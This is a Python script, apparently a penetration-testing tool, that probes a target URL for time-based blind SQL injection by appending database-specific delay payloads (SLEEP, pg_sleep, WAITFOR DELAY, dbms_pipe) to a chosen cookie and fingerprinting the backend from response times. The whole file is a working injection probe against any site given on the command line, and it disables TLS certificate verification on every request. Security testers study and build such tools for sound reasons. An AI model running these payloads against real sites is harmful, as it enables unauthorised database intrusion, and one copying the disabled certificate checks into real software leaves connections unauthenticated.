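"""Time-based blind SQL injection check against a cookie value.

The script fetches the cookies a site sets, lets the operator pick one,
appends a database-specific delay expression to that cookie, and treats a
response time at or above ``DELAY_THRESHOLD_SECONDS`` as a match for that
database.

All requests go through the local proxy configured in ``proxies`` with TLS
certificate verification switched off, so the server's identity is not
authenticated on any request this script makes.
"""

import sys
import time
import requests
import urllib.parse
import urllib3
from typing import Dict, Optional

# verify=False is used on every request below; this silences the warning that
# urllib3 would otherwise print for each unverified HTTPS connection.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Local intercepting proxy; requests fail if nothing listens on this port.
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}

# One delay expression per backend; each asks the database to pause for 10 s.
DB_PAYLOADS = {
    "Oracle": "dbms_pipe.receive_message(('a'),10)",
    "Microsoft SQL Server": "WAITFOR DELAY '0:0:10'",
    "PostgreSQL": "SELECT pg_sleep(10)",
    "MySQL": "SELECT SLEEP(10)",
}

# Upper bound for every HTTP request, so a stalled server cannot hang the run.
REQUEST_TIMEOUT_SECONDS = 15

# A response at least this slow is counted as the delay having executed.
DELAY_THRESHOLD_SECONDS = 9.0


def get_initial_cookies(url: str) -> Dict[str, str]:
    """Request *url* and return the cookies the server sets, as a dict.

    Exits the process with status 1 when the request fails or when the
    response carries no cookies.
    """
    print("(i) Fetching initial cookies from server...")
    try:
        # The original call had no timeout and could block forever; it now
        # uses the same bound as the payload requests.
        response = requests.get(
            url, verify=False, proxies=proxies, timeout=REQUEST_TIMEOUT_SECONDS
        )
    except requests.exceptions.RequestException as e:
        print(f"[-] Failed to fetch cookies: {e}")
        sys.exit(1)

    cookies = requests.utils.dict_from_cookiejar(response.cookies)
    if not cookies:
        print("[-] No cookies returned. Cannot proceed.")
        sys.exit(1)

    print("(+) Cookies received:")
    # Values are printed in full, so session identifiers end up in terminal
    # scrollback and in any captured output of this script.
    for name, value in cookies.items():
        print(f" {name} = {value}")
    return cookies


def select_injection_cookie(cookies: Dict[str, str]) -> str:
    """Prompt on stdin until the operator picks one cookie; return its name.

    Exits the process with status 1 if stdin is closed before a valid choice
    is made.
    """
    print("\n(?) Choose the cookie to inject payload into:")
    keys = list(cookies)
    for idx, name in enumerate(keys, 1):
        print(f" {idx}. {name}")

    while True:
        try:
            choice = int(input("Enter choice number: "))
        except ValueError:
            choice = 0  # not a number: handled as out of range below
        except EOFError:
            # Closed stdin (piped or non-interactive run) previously ended in
            # an unhandled traceback.
            print("\n[-] No selection made. Cannot proceed.")
            sys.exit(1)
        if 1 <= choice <= len(keys):
            return keys[choice - 1]
        print("[-] Invalid selection. Try again.")


def test_sqli_payload(
    url: str, cookies: Dict[str, str], injection_cookie: str, payload: str
) -> float:
    """Send one request with *payload* appended to a cookie; return seconds taken.

    The payload is wrapped as ``' || (payload)--``, URL-encoded and appended
    to the current value of *injection_cookie* in a copy of *cookies*, so the
    caller's dict is left unchanged.

    Returns the elapsed time rounded to two decimals, or ``0.0`` when the
    request raises (which includes hitting the request timeout).
    """
    encoded_payload = urllib.parse.quote(f"' || ({payload})--")
    test_cookies = cookies.copy()
    test_cookies[injection_cookie] += encoded_payload

    # perf_counter is monotonic; time.time() can jump when the wall clock is
    # adjusted, which would distort the measured delay.
    start = time.perf_counter()
    try:
        requests.get(
            url,
            cookies=test_cookies,
            verify=False,
            proxies=proxies,
            timeout=REQUEST_TIMEOUT_SECONDS,
        )
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return 0.0
    return round(time.perf_counter() - start, 2)


def detect_database(
    url: str, cookies: Dict[str, str], injection_cookie: str
) -> Optional[str]:
    """Try each entry of ``DB_PAYLOADS`` and return the first database that matches.

    A database matches when its request takes at least
    ``DELAY_THRESHOLD_SECONDS``. Returns ``None`` when none does.
    """
    print("\n(i) Attempting to fingerprint the database using time-based blind SQLi...")
    # NOTE(review): no unmodified request is timed for comparison, so a server
    # that is slow for unrelated reasons is reported as a match. Treat a hit as
    # unconfirmed until it is compared against a baseline response time.
    for db, payload in DB_PAYLOADS.items():
        print(f"(•) Testing for {db}... ", end="", flush=True)
        response_time = test_sqli_payload(url, cookies, injection_cookie, payload)
        if response_time >= DELAY_THRESHOLD_SECONDS:
            print(
                f"\n(+) Database fingerprinted: {db} (response time: {response_time}s)"
            )
            return db
        print(f"(not {db}) response time: {response_time}s")

    print("(-) Could not determine the backend database.")
    return None


def main():
    """Parse the single URL argument and run the check end to end."""
    if len(sys.argv) != 2:
        # The argument placeholder was missing from the usage line.
        print(f"(+) Usage: {sys.argv[0]} <url>")
        print(f"(+) Example: {sys.argv[0]} https://target.com")
        sys.exit(1)

    # Only trailing slashes are meant to go; strip("/") also ate leading ones.
    url = sys.argv[1].rstrip("/")
    print(f"(+) Checking {url} for time-based blind SQL injection...")

    cookies = get_initial_cookies(url)
    injection_cookie = select_injection_cookie(cookies)
    db_type = detect_database(url, cookies, injection_cookie)

    if db_type:
        print(f"(✓) {url} appears vulnerable to blind SQLi using {db_type} payloads.")
    else:
        print("(-) Target may not be vulnerable or timing threshold wasn't met.")


if __name__ == "__main__":
    main()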